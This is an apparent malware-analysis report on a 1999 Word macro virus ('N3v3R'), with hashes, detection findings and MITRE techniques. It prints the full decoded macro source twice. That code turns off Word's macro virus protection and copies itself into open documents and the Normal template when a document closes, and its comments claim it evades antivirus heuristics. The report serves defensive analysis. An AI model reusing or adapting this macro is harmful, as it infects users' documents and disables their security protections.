Office (OLE) malware analysis — malicious · b2b326959e68b456

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-21 20:08:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-30

MD5: 9a0ddf0b90e389e6c8d8eab94a557000 SHA-1: 7519b5e32b727cd7a3b26ca5e20a636c659dc5ed SHA-256: b2b326959e68b456277f6df324b8e0814751a1dc81de6190859c758bbf24ecb2

168 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1553.005 Disable or Modify Security Settings: Macro Security

This legacy Word document contains a WordBasic macro that attempts to disable macro security settings and replicate itself to other documents and templates. The macro's AutoClose subroutine is designed to execute upon closing the document, facilitating its spread. The embedded script also contains comments indicating it was designed to be undetectable by older antivirus heuristics.

Heuristics 5

ClamAV: Doc.Trojan.Ever-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ever-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False ' the basic stuff you asked for :-)
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1328 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1328 bytes
SHA-256: `944ef8ebc8e2ba4cfd5e5e6c91c26aaff2b7b98e02ef129241422511a4c86545`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' N3v3R v1.0 by SPo0Ky[CB], 21st June 1999 ' SR-1 Compatible MS-Word bug with 5 lines of code. ' Includes "the basic stuff", a small payload which ' would set a random password (though it never gets activated), ' and as a bonus it is even undetectable by F-Prot's and AVP's ' heuristics :-) Sub AutoClose() Options.VirusProtection = False ' the basic stuff you asked for :-) x = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' gets the virus's code If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the activedocument If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the normaltemplate If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which will never get activated, see it as a payload which actually just wastes time and space! :-) End Sub

SHA-256: 944ef8ebc8e2ba4cfd5e5e6c91c26aaff2b7b98e02ef129241422511a4c86545

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' N3v3R v1.0 by SPo0Ky[CB], 21st June 1999
' SR-1 Compatible MS-Word bug with 5 lines of code.
' Includes "the basic stuff", a small payload which
' would set a random password (though it never gets activated),
' and as a bonus it is even undetectable by F-Prot's and AVP's
' heuristics :-)

Sub AutoClose()
Options.VirusProtection = False ' the basic stuff you asked for :-)
x = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' gets the virus's code
If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the activedocument
If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the normaltemplate
If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which will never get activated, see it as a payload which actually just wastes time and space! :-)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.